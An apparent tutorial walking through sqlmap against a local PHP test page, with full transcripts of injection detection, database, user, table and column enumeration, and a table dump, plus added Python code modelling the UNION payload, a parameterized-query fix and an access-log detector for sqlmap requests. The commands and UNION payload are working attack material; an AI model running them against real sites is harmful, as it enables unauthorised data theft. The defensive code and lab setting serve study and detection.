Hacking is this easy

sqlmap notes

sqlmap -u "http://localhost/sqltest/showart.php?id=34"

The trailing GET in the invocation recorded below is not a sqlmap option and has no effect; sqlmap takes the HTTP method from the request itself, and `--method=GET` exists if one has to be forced. Every run on this page starts with "resuming back-end DBMS 'mysql'" and "resumed the following injection point(s) from stored session", which means they all replay a stored session under ~/.sqlmap/output: the initial detection run that found the injection in `id` is not reproduced here. The recorded injection point is a 3-column UNION query in a quoted string context (`id=34'`): 48 is the filler value sqlmap put in the two columns it does not read, and `CONCAT(0x7170707871, ..., 0x71786a6b71)` wraps the value it wants between two marker strings so it can locate that value in the HTML response.

wangleileideMacBook-Air:sqltest wangleilei$ sqlmap -u "http://localhost/sqltest/showart.php?id=34" GET
         _
 ___ ___| |_____ ___ ___  {1.0.7.0#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 01:18:27

[01:18:27] [INFO] resuming back-end DBMS 'mysql' 
[01:18:27] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: UNION query
    Title: MySQL UNION query (48) - 3 columns
    Payload: id=34' UNION ALL SELECT 48,CONCAT(0x7170707871,0x7866466e4b7944666c594d76596d6c5454466e7374554a684c7951754f654d466468796143444b42,0x71786a6b71),48#
---
[01:18:27] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.36, Apache 2.4.18
back-end DBMS: MySQL 5
[01:18:27] [INFO] fetched data logged to text files under '/Users/wangleilei/.sqlmap/output/localhost'

[*] shutting down at 01:18:27

wangleileideMacBook-Air:sqltest wangleilei$ 
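To make the recorded payload concrete, here is an added example (not code from the original post or from sqlmap) that models the injection point the transcript reports and shows how the UNION payload carries a chosen value into the page between the two markers, how the response is parsed the way sqlmap parses it, and why binding `id` as a parameter stops the whole thing. Assumptions: the target was MySQL, but this uses Python's bundled sqlite3 so it runs offline, so the MySQL-only parts of the payload are rewritten in SQLite dialect (`||` for CONCAT(), `-- ` for `#`, `sqlite_master` for information_schema); the `article` rows are constructed; `ys_rwcs` uses the columns and the single row shown in the page's own dump; the `render_vulnerable` function is a stand-in for showart.php, whose source is not on the page.

```python
"""Added example, not code from the original post or from sqlmap.

Models the injection point sqlmap reported (a quoted `id` in a 3-column SELECT)
and shows the UNION payload smuggling a value into the page between the two
marker strings, plus the parameterized version that defeats it.  SQLite is used
in place of MySQL so this runs offline, so the payload uses SQLite dialect:
`||` instead of CONCAT(), `-- ` instead of `#`, sqlite_master for information_schema.
"""
import re
import sqlite3


def decode_hex_literal(lit):
    """Decode a MySQL 0x.. string literal; sqlmap uses them to avoid quote characters."""
    return bytes.fromhex(lit[2:]).decode("ascii")


# The two markers from the reported payload: CONCAT(0x7170707871, ..., 0x71786a6b71)
PREFIX = decode_hex_literal("0x7170707871")   # 'qppxq'
SUFFIX = decode_hex_literal("0x71786a6b71")   # 'qxjkq'
# The 40-character random token sqlmap injected to confirm the UNION works.
TOKEN = decode_hex_literal(
    "0x7866466e4b7944666c594d76596d6c5454466e7374554a684c7951754f654d466468796143444b42"
)


def setup_db():
    """In-memory stand-in for the ctz database (article rows are constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE article (id INTEGER, title TEXT, body TEXT);
        INSERT INTO article VALUES (34, 'hello', 'first article');
        CREATE TABLE ys_rwcs (id INTEGER, kqzt INTEGER, scyxsj INTEGER, scid INTEGER,
                              sckjjg TEXT, dqid INTEGER, xtcjsj INTEGER, kjdj INTEGER);
        INSERT INTO ys_rwcs VALUES (1, 0, 1488499312, 5939, NULL, 5940, 1487741441, 1);
    """)
    return conn


def render_vulnerable(conn, id_param):
    """Stand-in for showart.php: the raw GET parameter is spliced into the SQL text."""
    sql = f"SELECT id, title, body FROM article WHERE id='{id_param}'"
    rows = conn.execute(sql).fetchall()
    return "\n".join(f"<h1>{title}</h1><p>{body}</p>" for _id, title, body in rows)


def render_safe(conn, id_param):
    """The same page with a bound parameter: the value can never become SQL."""
    rows = conn.execute(
        "SELECT id, title, body FROM article WHERE id=?", (id_param,)
    ).fetchall()
    return "\n".join(f"<h1>{title}</h1><p>{body}</p>" for _id, title, body in rows)


def union_payload(expr, from_clause=""):
    """Build an `id` value shaped like sqlmap's: close the string literal, UNION ALL
    with the same 3 columns (48 as filler for the unused ones), wrap `expr` in the
    markers, and comment out the rest of the original query."""
    return f"34' UNION ALL SELECT 48,'{PREFIX}'||({expr})||'{SUFFIX}',48{from_clause}-- "


def extract(page):
    """What sqlmap does with the response: pull out everything between the markers."""
    return re.findall(re.escape(PREFIX) + "(.*?)" + re.escape(SUFFIX), page, re.S)


def probe(conn):
    """Detection step: inject a known token and check that it comes back in the page."""
    page = render_vulnerable(conn, union_payload(f"'{TOKEN}'"))
    return TOKEN in extract(page)


def list_tables(conn):
    """Enumeration step, the SQLite equivalent of `-D ctz --tables`."""
    payload = union_payload("name", " FROM sqlite_master WHERE type='table'")
    return sorted(extract(render_vulnerable(conn, payload)))


if __name__ == "__main__":
    db = setup_db()
    print("markers:", PREFIX, SUFFIX)
    print("injection confirmed:", probe(db))
    print("tables via injection:", list_tables(db))
    print("same payload against the bound query:",
          repr(render_safe(db, union_payload("name", " FROM sqlite_master"))))
```

The point of `probe` is that sqlmap never needs to see the SQL: it only checks whether a value it chose appears between its own markers in the HTML. The same mechanism with a different `expr`/`FROM` clause is what every later step on this page (`--dbs`, `--tables`, `--columns`, `--dump`) does, one query per row. In `render_safe` the bound parameter is compared as a value, so the quote and the UNION never reach the parser and the page returns nothing for the payload.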

Enumerating databases

sqlmap -u "http://localhost/sqltest/showart.php?id=34" --dbs

wangleileideMacBook-Air:sqltest wangleilei$ sqlmap -u "http://localhost/sqltest/showart.php?id=34" --dbs
         _
 ___ ___| |_____ ___ ___  {1.0.7.0#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 01:22:52

[01:22:52] [INFO] resuming back-end DBMS 'mysql' 
[01:22:52] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: UNION query
    Title: MySQL UNION query (48) - 3 columns
    Payload: id=34' UNION ALL SELECT 48,CONCAT(0x7170707871,0x7866466e4b7944666c594d76596d6c5454466e7374554a684c7951754f654d466468796143444b42,0x71786a6b71),48#
---
[01:22:52] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.36, Apache 2.4.18
back-end DBMS: MySQL 5
[01:22:52] [INFO] fetching database names
[01:22:52] [INFO] the SQL query used returns 8 entries
[01:22:52] [INFO] resumed: information_schema
[01:22:52] [INFO] resumed: BYSJ
[01:22:52] [INFO] resumed: YGGL
[01:22:52] [INFO] resumed: ctz
[01:22:52] [INFO] resumed: mysql
[01:22:52] [INFO] resumed: new_schema
[01:22:52] [INFO] resumed: performance_schema
[01:22:52] [INFO] resumed: sys
available databases [8]:                                                       
[*] BYSJ
[*] ctz
[*] information_schema
[*] mysql
[*] new_schema
[*] performance_schema
[*] sys
[*] YGGL

[01:22:52] [INFO] fetched data logged to text files under '/Users/wangleilei/.sqlmap/output/localhost'

[*] shutting down at 01:22:52
Eight databases come back. information_schema, mysql, performance_schema and sys are MySQL's own system schemas (the presence of sys means this is MySQL 5.7 or later); the application data lives in the other four, BYSJ, YGGL, ctz and new_schema. Being able to list all of them is itself a finding: information_schema only shows a user the schemas it has privileges on, so the account behind this page can see every schema on the server, not just its own. Next, which database does the vulnerable file use:

sqlmap -u "http://localhost/sqltest/showart.php?id=34" --current-db

wangleileideMacBook-Air:sqltest wangleilei$ sqlmap -u "http://localhost/sqltest/showart.php?id=34" --current-db
         _
 ___ ___| |_____ ___ ___  {1.0.7.0#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 01:25:15

[01:25:15] [INFO] resuming back-end DBMS 'mysql' 
[01:25:15] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: UNION query
    Title: MySQL UNION query (48) - 3 columns
    Payload: id=34' UNION ALL SELECT 48,CONCAT(0x7170707871,0x7866466e4b7944666c594d76596d6c5454466e7374554a684c7951754f654d466468796143444b42,0x71786a6b71),48#
---
[01:25:16] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.36, Apache 2.4.18
back-end DBMS: MySQL 5
[01:25:16] [INFO] fetching current database
current database:    'ctz'
[01:25:16] [INFO] fetched data logged to text files under '/Users/wangleilei/.sqlmap/output/localhost'

[*] shutting down at 01:25:16

The current database is ctz. Next, the database users. Note that `--users` enumerates every account in mysql.user, which only works because the connection the page uses is allowed to read that table; `--current-user` reports the account the page itself connects as, and `--is-dba` tells you whether that account has DBA privileges. Both are worth running before deciding how far to take the enumeration.

sqlmap -u "http://localhost/sqltest/showart.php?id=34" --users

wangleileideMacBook-Air:sqltest wangleilei$ sqlmap -u "http://localhost/sqltest/showart.php?id=34" --users
         _
 ___ ___| |_____ ___ ___  {1.0.7.0#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 01:28:02

[01:28:02] [INFO] resuming back-end DBMS 'mysql' 
[01:28:02] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: UNION query
    Title: MySQL UNION query (48) - 3 columns
    Payload: id=34' UNION ALL SELECT 48,CONCAT(0x7170707871,0x7866466e4b7944666c594d76596d6c5454466e7374554a684c7951754f654d466468796143444b42,0x71786a6b71),48#
---
[01:28:02] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.36, Apache 2.4.18
back-end DBMS: MySQL 5
[01:28:02] [INFO] fetching database users
[01:28:02] [INFO] the SQL query used returns 29 entries
database management system users [2]:                                          
[*] 'mysql.sys'@'localhost'
[*] 'root'@'localhost'

[01:28:02] [INFO] fetched data logged to text files under '/Users/wangleilei/.sqlmap/output/localhost'

[*] shutting down at 01:28:02
The listing shows two accounts: 'mysql.sys'@'localhost' and 'root'@'localhost'. mysql.sys is the locked account MySQL 5.7 creates as the definer for the sys schema, so the only usable account is root, and the application almost certainly connects as it; `--current-user` would confirm that. An application connecting as root is why every step on this page succeeds, including reading mysql.user.
List all tables in the current database:

sqlmap -u "http://localhost/sqltest/showart.php?id=34" -D ctz --tables

wangleileideMacBook-Air:sqltest wangleilei$ sqlmap -u "http://localhost/sqltest/showart.php?id=34" -D ctz --tables
         _
 ___ ___| |_____ ___ ___  {1.0.7.0#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 01:40:11

[01:40:11] [INFO] resuming back-end DBMS 'mysql' 
[01:40:11] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: UNION query
    Title: MySQL UNION query (48) - 3 columns
    Payload: id=34' UNION ALL SELECT 48,CONCAT(0x7170707871,0x7866466e4b7944666c594d76596d6c5454466e7374554a684c7951754f654d466468796143444b42,0x71786a6b71),48#
---
[01:40:11] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.36, Apache 2.4.18
back-end DBMS: MySQL 5
[01:40:11] [INFO] fetching tables for database: 'ctz'
[01:40:11] [INFO] the SQL query used returns 13 entries
[01:40:11] [INFO] resumed: article
[01:40:11] [INFO] resumed: ys_admin
[01:40:11] [INFO] resumed: ys_cs
[01:40:11] [INFO] resumed: ys_gmjl
[01:40:11] [INFO] resumed: ys_huifu
[01:40:11] [INFO] resumed: ys_rwcs
[01:40:11] [INFO] resumed: ys_rwlb
[01:40:11] [INFO] resumed: ys_txjl
[01:40:11] [INFO] resumed: ys_users
[01:40:11] [INFO] resumed: ys_wxcd
[01:40:11] [INFO] resumed: ys_xtcs
[01:40:11] [INFO] resumed: ys_yjjl
[01:40:11] [INFO] resumed: ys_zjmx
Database: ctz                                                                  
[13 tables]
+----------+
| article  |
| ys_admin |
| ys_cs    |
| ys_gmjl  |
| ys_huifu |
| ys_rwcs  |
| ys_rwlb  |
| ys_txjl  |
| ys_users |
| ys_wxcd  |
| ys_xtcs  |
| ys_yjjl  |
| ys_zjmx  |
+----------+

[01:40:11] [INFO] fetched data logged to text files under '/Users/wangleilei/.sqlmap/output/localhost'

[*] shutting down at 01:40:11

List all columns of any of the tables found above (ys_rwcs as the example):

sqlmap -u "http://localhost/sqltest/showart.php?id=34" -D ctz -T ys_rwcs --columns

wangleileideMacBook-Air:sqltest wangleilei$ sqlmap -u "http://localhost/sqltest/showart.php?id=34" -D ctz -T ys_rwcs --columns
         _
 ___ ___| |_____ ___ ___  {1.0.7.0#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 01:43:19

[01:43:20] [INFO] resuming back-end DBMS 'mysql' 
[01:43:20] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: UNION query
    Title: MySQL UNION query (48) - 3 columns
    Payload: id=34' UNION ALL SELECT 48,CONCAT(0x7170707871,0x7866466e4b7944666c594d76596d6c5454466e7374554a684c7951754f654d466468796143444b42,0x71786a6b71),48#
---
[01:43:20] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.36, Apache 2.4.18
back-end DBMS: MySQL 5
[01:43:20] [INFO] fetching columns for table 'ys_rwcs' in database 'ctz'
[01:43:20] [INFO] the SQL query used returns 8 entries
[01:43:20] [INFO] resumed: "id","int(11)"
[01:43:20] [INFO] resumed: "kqzt","int(11)"
[01:43:20] [INFO] resumed: "scyxsj","int(11)"
[01:43:20] [INFO] resumed: "scid","int(11)"
[01:43:20] [INFO] resumed: "sckjjg","varchar(255)"
[01:43:20] [INFO] resumed: "dqid","int(11)"
[01:43:20] [INFO] resumed: "xtcjsj","int(11)"
[01:43:20] [INFO] resumed: "kjdj","int(11)"
Database: ctz                                                                  
Table: ys_rwcs
[8 columns]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| dqid   | int(11)      |
| id     | int(11)      |
| kjdj   | int(11)      |
| kqzt   | int(11)      |
| scid   | int(11)      |
| sckjjg | varchar(255) |
| scyxsj | int(11)      |
| xtcjsj | int(11)      |
+--------+--------------+

[01:43:20] [INFO] fetched data logged to text files under '/Users/wangleilei/.sqlmap/output/localhost'

[*] shutting down at 01:43:20

Dumping column contents

sqlmap -u "http://localhost/sqltest/showart.php?id=34" -D ctz -T ys_rwcs --dump

The invocation recorded below passes "email,name,openid" as a bare argument without the `-C` option, and ys_rwcs has no columns by those names (its eight columns are listed above), so the column list has no effect and sqlmap dumps the whole table, which is what the output shows. To dump only selected columns, name them with `-C`, e.g. `-C dqid,scid,sckjjg`; to dump every table in the database, use `-D ctz --dump` with no `-T`. Even on a target you are authorised to test, remember that `--dump` writes the rows to CSV files under ~/.sqlmap/output (the path is printed at the end of each run), so that directory now holds the target's data and needs the same handling as the target itself.

wangleileideMacBook-Air:sqltest wangleilei$ sqlmap -u "http://localhost/sqltest/showart.php?id=34" -D ctz -T ys_rwcs "email,name,openid" --dump
         _
 ___ ___| |_____ ___ ___  {1.0.7.0#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 01:48:16

[01:48:16] [INFO] resuming back-end DBMS 'mysql' 
[01:48:16] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: UNION query
    Title: MySQL UNION query (48) - 3 columns
    Payload: id=34' UNION ALL SELECT 48,CONCAT(0x7170707871,0x7866466e4b7944666c594d76596d6c5454466e7374554a684c7951754f654d466468796143444b42,0x71786a6b71),48#
---
[01:48:16] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.36, Apache 2.4.18
back-end DBMS: MySQL 5
[01:48:16] [INFO] fetching columns for table 'ys_rwcs' in database 'ctz'
[01:48:16] [INFO] the SQL query used returns 8 entries
[01:48:16] [INFO] resumed: "id","int(11)"
[01:48:16] [INFO] resumed: "kqzt","int(11)"
[01:48:16] [INFO] resumed: "scyxsj","int(11)"
[01:48:16] [INFO] resumed: "scid","int(11)"
[01:48:16] [INFO] resumed: "sckjjg","varchar(255)"
[01:48:16] [INFO] resumed: "dqid","int(11)"
[01:48:16] [INFO] resumed: "xtcjsj","int(11)"
[01:48:16] [INFO] resumed: "kjdj","int(11)"
[01:48:16] [INFO] fetching entries for table 'ys_rwcs' in database 'ctz'       
[01:48:16] [WARNING] reflective value(s) found and filtering out
[01:48:16] [INFO] the SQL query used returns 1 entries
[01:48:16] [INFO] retrieved: "5940","1","1","0","5939"," ","1488499312","1487...
[01:48:16] [INFO] analyzing table dump for possible password hashes            
Database: ctz
Table: ys_rwcs
[1 entry]
+----+------+------+------+------+------------+--------+------------+
| id | dqid | scid | kjdj | kqzt | scyxsj     | sckjjg | xtcjsj     |
+----+------+------+------+------+------------+--------+------------+
| 1  | 5940 | 5939 | 1    | 0    | 1488499312 | NULL   | 1487741441 |
+----+------+------+------+------+------------+--------+------------+

[01:48:16] [INFO] table 'ctz.ys_rwcs' dumped to CSV file '/Users/wangleilei/.sqlmap/output/localhost/dump/ctz/ys_rwcs.csv'
[01:48:16] [INFO] fetched data logged to text files under '/Users/wangleilei/.sqlmap/output/localhost'

[*] shutting down at 01:48:16
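Seen from the server side, every run on this page is one or more GET requests to showart.php with the UNION payload in `id`. The following is an added example (not from the original post) of a small detector for those requests, run over constructed Apache combined-format access log lines modelled on the request the transcripts show; the author's real Apache logs are not on the page, the timestamps and sizes are made up, and the third line's enumeration query is an illustration of what a `--dbs` request looks like, not a capture. The rules rest on two assumptions about sqlmap: its default User-Agent is `sqlmap/<version> (http://sqlmap.org)` unless `--random-agent` or `--user-agent` is given, and its UNION payloads bracket the extracted value with 5-byte hex literals of the form 0x71....71 ('q' + 3 random letters + 'q'), exactly as in the payload above, which still shows when the User-Agent is spoofed.

```python
"""Added example, not from the original post: flag sqlmap-style UNION requests in
Apache combined-format access logs.  The log lines below are constructed."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# UNION [ALL] SELECT, allowing whitespace or inline comments between the keywords
UNION_SELECT_RE = re.compile(
    r"\bUNION\b(?:\s|/\*.*?\*/)+(?:ALL(?:\s|/\*.*?\*/)+)?SELECT\b", re.I
)
# sqlmap's marker literals: 'q' + 3 letters + 'q', hex-encoded, so 0x71xxxxxx71
MARKER_RE = re.compile(r"0x71[0-9a-f]{6}71\b", re.I)
# assumption: sqlmap's default UA unless --random-agent/--user-agent was used
SQLMAP_UA_RE = re.compile(r"^sqlmap/", re.I)

# Constructed sample lines modelled on the request in the transcripts above.
SAMPLE_LOG = [
    '127.0.0.1 - - [03/Mar/2017:01:18:20 +0800] "GET /sqltest/showart.php?id=34 HTTP/1.1" '
    '200 1532 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36"',
    # the recorded detection payload, URL-encoded as it travels on the wire
    '127.0.0.1 - - [03/Mar/2017:01:18:27 +0800] "GET /sqltest/showart.php?id=34%27%20UNION%20ALL%20SELECT%2048%2C'
    'CONCAT%280x7170707871%2C0x7866466e4b7944666c594d76596d6c5454466e7374554a684c7951754f654d466468796143444b42%2C'
    '0x71786a6b71%29%2C48%23 HTTP/1.1" 200 1603 "-" "sqlmap/1.0.7.0#dev (http://sqlmap.org)"',
    # an enumeration request with a spoofed browser UA (illustrative query, not a capture)
    '10.0.0.5 - - [03/Mar/2017:01:22:52 +0800] "GET /sqltest/showart.php?id=34%27%20UNION%20ALL%20SELECT%2048%2C'
    'CONCAT%280x7170707871%2Cschema_name%2C0x71786a6b71%29%2C48%20FROM%20information_schema.schemata%23 HTTP/1.1" '
    '200 2104 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"',
]


def parse_line(line):
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Return the list of reasons a parsed line looks like a sqlmap/UNION request."""
    reasons = []
    if SQLMAP_UA_RE.search(entry["ua"]):
        reasons.append("sqlmap user-agent")
    # parse_qsl percent-decodes, so the rules see the same text the SQL parser saw
    query = urlsplit(entry["path"]).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        if UNION_SELECT_RE.search(value):
            reasons.append(f"UNION SELECT in parameter {name!r}")
        if len(MARKER_RE.findall(value)) >= 2:
            reasons.append(f"sqlmap marker literals in parameter {name!r}")
    return reasons


def scan(lines):
    """Return (client ip, decoded path, reasons) for every flagged line."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            hits.append((entry["ip"], unquote(entry["path"]), reasons))
    return hits


if __name__ == "__main__":
    for ip, path, reasons in scan(SAMPLE_LOG):
        print(ip, path[:80], reasons)
```

The User-Agent rule is cheap but only catches runs that kept the default; the marker rule is the one that matters, because the `0x71....71` pairs are part of how sqlmap finds its results and survive `--random-agent`. A real deployment would also want the blind and error-based payload shapes sqlmap uses when no UNION is available, which this page does not show.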